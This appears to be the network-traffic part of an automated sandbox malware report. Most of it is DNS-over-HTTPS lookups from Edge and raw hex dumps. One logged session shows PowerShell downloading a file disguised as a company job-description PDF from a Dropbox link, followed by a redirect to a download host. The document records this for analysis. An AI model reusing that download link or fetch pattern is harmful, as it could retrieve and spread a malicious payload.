                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                  Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  8192.168.2.549755162.125.69.184439048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC288OUTGET /scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Content-Security-Policy: base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://*.dropbox.com ; media-src https://* blob: ; form-action https: [TRUNCATED]
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Location: https://ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.com/cd/0/get/CghMt0qCMFbaG-NuPIK8GzgfQMYcjuyFfJKTiOND84sA8tMUGrkGOZ7fi8XSwE-1bqvHAWSNvtWm1SpXZc9BBK5a9N6-SZDpaLzB_DVGOMpLXj9IZZwa8nHuODpLQG-O2MKwkaVMrbo-C1A-sLTOFtY-/file?dl=1#
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                  Set-Cookie: gvc=MjQ5OTYwODYzOTk3OTY1MDU2MzI2NDQzODI4Mzc4ODI4NDIwNDY5; Path=/; Expires=Tue, 18 Dec 2029 12:44:28 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: t=ybPuiNiCCTkSY5Z4fxt5wwOT; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:28 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=ybPuiNiCCTkSY5Z4fxt5wwOT; Path=/; Expires=Fri, 19 Dec 2025 12:44:28 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=fWwmnF_kpk; Path=/; Expires=Fri, 19 Dec 2025 12:44:28 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:28 GMT
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:28 GMT
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 4043dcdc3f0f4ea6ac7764bbc8edc95e
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  9192.168.2.549760172.64.41.34437596C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:28 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477bf5c8d80c90-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ca 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  10192.168.2.549765172.64.41.34437596C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:28 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477bf5cbdd41a6-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 00 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom))


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  11192.168.2.549762172.64.41.34437596C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:28 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477bf5cc3141d9-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom c)


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  12192.168.2.549766172.64.41.34437596C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:28 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477bf61c7017ad-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f3 00 04 8e fa 40 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom@C)


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  13192.168.2.549768172.64.41.34437596C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:28 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477bf6ae3bf793-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 c4 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  14192.168.2.549769172.64.41.34437596C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:28 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477bf6b8bd42b1-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ad 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom c)


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  15192.168.2.549771172.64.41.34437596C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:29 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:29 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477bfe8fbe7cea-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 23 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom#()


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  16192.168.2.549774172.64.41.34437596C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
